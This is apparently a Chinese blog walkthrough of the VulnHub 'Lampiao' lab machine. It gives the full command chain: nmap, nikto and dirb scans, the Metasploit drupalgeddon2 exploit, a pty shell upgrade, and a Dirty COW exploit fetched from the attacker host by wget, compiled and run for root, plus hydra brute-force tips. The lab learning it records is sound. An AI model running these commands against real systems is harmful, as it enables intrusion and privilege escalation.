Lampiao


Lampiao

image-20210519163046106

前提信息:

kali 192.168.229.129

Lampiao未知

主机发现

1
2
nmap -sP 192.168.299.0/24
// 扫描192.168.229网段下的所有主机

image-20210519164912383

起始ip为192.168.229.1,结束ip为192.168.229.254,而kali ip为192.168.229.129,所以靶机ip就是192.168.229.135

192.168.229.1为虚拟网卡地址

192.168.229.2是虚拟网卡网关地址

端口扫描

1
nmap 192.168.229.135 -p 1-65535

image-20210519170419899

扫描出了22、80、1898端口

22端口进行ssh弱口令爆破

具体操作可以使用msf或是hydra进行爆破

80端口It's easy Fidumaegud!

image-20210519170704797

1898端口是一个博客的登录界面

image-20210519171331868

目录扫描

使用工具nikto或是dirb

nikto是一款web漏洞扫描工具

dirb是web目录扫描工具

1
nikto -h http://192.168.229.135:1898

image-20210522115857417

image-20210522115927983

1
dirb http://192.168.229.135:1898

image-20210522115825431

image-20210522120000875

存在敏感信息泄露

访问includes目录

image-20210522203456574

发现存在robots.txt文件

访问robots.txt目录

image-20210522234134580

profiles/README.txt文件中会发现cms是drupal

image-20210522212104924

CHANGELOG.txt文件中发现drupal版本为7.54,更新时间为2017-02-01

image-20210523103734866

百度查找drupal漏洞

image-20210523103946363

漏洞分析

使用msf

search drupal

搜索相应漏洞

image-20210523104844441

2018-03-28drupal爆出一个RCE,CVE编号为CVE-2018-7600

show options

image-20210523110539063

use exploit/unix/webapp/drupal_drupalgeddon2

set rhosts 192.168.229.135

set rport 1898

show targets

run

image-20210523110617795

获取到会话

image-20210523112127404

交互式命令

执行shell获取交互式命令,由于我们获取的shell并不是一个具有完整交互的shell,对于已经安装了python的系统,我们可以使用python提供的pty模块,只需要一行脚本就可以创建一个原生的终端,

命令如下:python -c 'import pty; pty.spawn("/bin/bash")'

//切换到/bin/bash

查看文件及其权限

ls -li

image-20210523162343113

发现两个音频文件,两张图片

下载audio.m4a会朗读:user t-i-a-g-o有一说一没有听出来emmmm

用户名可能是tiago

而图片qrc.png是一个二维码,内容是:Try harder!muahuahua

另外的图片和音频并没有发现有用信息

还是对站点的信息收集不够全面,其实在1898端口那个界面就能发现一些猫腻

两个文章的url分别是:http://192.168.229.135:1898/?q=node/1http://192.168.229.135:1898/?q=node/3唯独没有/?q=node/2

image-20210523165940420

访问会发现两个重要的信息audio.m4aqrc.png

查看账号信息

cat /etc/passwd

image-20210523160700792

查看操作系统和内核版本

uname -a

image-20210523160928039

内核提权

权限是低权限www-data用户,需要提权

脏牛(Dirty COW)

t017c4bda502a18a05c

影响范围

Linux内核>=2.6.22 (2007年发行)开始就受影响了,直到2016年10月18日才修复

危害

低权限用户利用该漏洞可以在众多Linux系统上实现本地提权

简要分析

get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者passwd程序就可以达到root的目的

开始操作

Lampiao内核版本为4.4.0

可以去网上搜索exp或是直接使用kali中自带的searchsploit

searchsploit dirty

image-20210524091130922

cp复制到本地

1
2
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~
python -m SimpleHTTPServer 5555

这里一开始是在root权限下,复制的文件也在/root目录下,以至于在使用python开启5555端口的服务时靶机并不能下载该文件

解决:切换到user用户下重新下载即可

image-20210524094133696

image-20210524093919689

下载kali的40847.cpp

1
wget http://192.168.229.129:5555/40847.cpp

下载失败

image-20210524095054903

执行gcc编译可执行文件,可直接提权

1
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

参数分析:

参数分析

-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow

image-20210524095337436

查看./40847

image-20210524095406136

ssh登录

image-20210524213622884

找到flag

第一次刷vulnhub靶机,可以说是完完全全参考大佬们的博客进行的,真的很水,不过也学到了许多干货,争取下个靶机可以先自己来刷

wuwuwu我是fw

其他信息

/var/www/html/sites/default/settings.php存在敏感信息

image-20210524221756239

结合用户名tiago,当使用密码为Virgulino可以成功提权为tiago

image-20210524222146058

在获取到开发22端口的信息后,可以使用工具进行弱口令爆破emmmm不过暂时还没有总结,附上大佬们的一些工具和流程

cewl:通过爬行网站获取关键信息创建一个密码字典
hydra:神器九头蛇,网上有太多资料

先利用cewl来生成一份结合网站目标的社工性质的密码字典、不理解的可以搜索网上搜索cewl学习,然后九头蛇暴力破解得到用户密码

知识点总结:

  • 信息收集

nmap -sP ip

nmap ip -p 1-63335

nikto -h http://ip

dirb http://ip

  • msf使用
  • 脏牛提权

searchsploit dirty

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~
python -m SimpleHTTPServer 5555

wget http://192.168.229.129:5555/40847.cpp

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

./40847

参考链接:

vulnhub|渗透测试lampiao

VulnHub-Lampiao-Walkthrough渗透学习

Vulnhub之路Ⅰ——Lampiao

记一次 Drupal + 脏牛提权 Ubuntu

脏牛Linux本地提权漏洞复现(CVE-2016-5195)


文章作者: l0odrd
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 l0odrd !
  目录